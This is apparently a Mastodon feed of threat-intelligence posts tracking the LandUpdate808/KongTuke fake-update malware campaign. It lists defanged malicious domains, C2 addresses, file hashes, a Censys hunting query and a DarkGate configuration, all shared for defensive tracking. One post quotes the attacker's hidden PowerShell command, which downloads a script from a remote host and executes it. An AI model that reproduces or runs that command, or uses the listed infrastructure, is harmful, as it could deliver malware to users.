Mastodawn

Jacob Nov 26, 2024

Latest #Kongtuke / #LandUpdate808 infra:
esaleerugs[.]com/e365r.js
ilsotto[.]com/n934rhj.js
nastictac[.]com/365h.js

Dusty Nov 18, 2024

#LandUpdate808 / #Kongtuke Update Chain:
Injected Website ->
hxxps[://]eliztalks[.]com/wp-config[.]js* ->
hxxps[://]eliztalks[.]com/js[.]php?device=windows&ip=<b64 ip>=&refferer=<b64 referrer>&browser=<b64 browser>&ua=<b64 user-agent>&domain=<b64 domain>&loc=<b64>=&is_ajax=1 ->
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[://]robnzuwubz[.]top/1[.]php?s=527;iex $global:block[.]content ->
hxxp[://]cignjjgmdnbchhc[.]top:80/<random>.php?id=<host_name>&key=<check generated>&s=527

Jacob Nov 14, 2024

Likely next #Landupdate808 / #Kongtuke infra:
rshank[.]com

Still was never able to get a payload from the last reported infra, vicrin[.]com

Jacob Nov 6, 2024

Next likely #LandUpdate808 infra:
vicrin[.]com

MalasadaTech Nov 3, 2024

Observed a new beginning part of the delivery chain for #LandUpdate808

hxxps[:]//mercro[.]com/web-metrics.js

Found in Silent Push. Can't get the next part yet.

https://urlscan.io/search/#mercro.com

Search - urlscan.io

urlscan.io - Website scanner for suspicious and malicious URLs

Randy Oct 22, 2024

I just don't use Censys as much as I should. Crafted something that does reasonably well at spotting #KongTuke #LandUpdate808 hosts.

services.http.response.body_hash="sha1:4cb2c207d5a9bb582aa3ddd06786d1afa0d8bada" and services.software.vendor=`Ubuntu`

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body_hash%3D%22sha1%3A4cb2c207d5a9bb582aa3ddd06786d1afa0d8bada%22+and+services.software.vendor%3D%60Ubuntu%60

Just wish there was a method to filter to just results with hostnames.

Looks to me like cloudy[.]zone will likely end up part of this threat.

@MalasadaTech

Jacob Oct 10, 2024

Latest #LandUpdate808 killchain observed today:
victim site
-->
pushcd[.]com/web-analyzer.js
-->
cloudflare[.]com/cdn-cgi/trace (checking IP info)
-->
pushcg[.]com/js.php?device=windows&ip=[IP INFO]&refferer=[REFERRER URL]&browser=chrome&ua=[USER AGENT]&domain=[C2 DOMAIN]&loc=VVM=&is_ajax=1
-->
contactsyracuse[.]org/wp-admin/js/qrtz.php
-->
upd_1794921.exe (2fa83a1f4b3196a87645d4e71c3a486c7eb433ccb462c85888d5a5dee2abe2e2)

Other stage 2 domain found:
dealmakerwealthsociety[.]com/wp-content/plugins/qartz.php

Darkgate Config:
Darkgate Version: 6.9.2
Campaign ID: new10oct
C2: 91.222.173[.]80

MalasadaTech Aug 15, 2024

#LandUpdate808 domain found in research, not from anything injected into a compromised site.

greyspartners[.]com/analytics.js

As seen here:
https://urlscan.io/result/0503f332-9a1d-4371-a54a-4451dbfded79/#summary

greyspartners.com - urlscan.io

urlscan.io - Website scanner for suspicious and malicious URLs

MalasadaTech Jul 9, 2024

Observed new #LandUpdate808 infection chain.

Compromised site:
-->
bretagne-balades[.]com/wp-includes/css/539.php (Update_#######.msix)
-->
45[.]11.59.217:443 (NetSupport, NSM301071)

4c2f8feced7768f756ac7d4fa633b08fd61f0ba198c860fa4f1093dedbf060d2 Update_#######.msix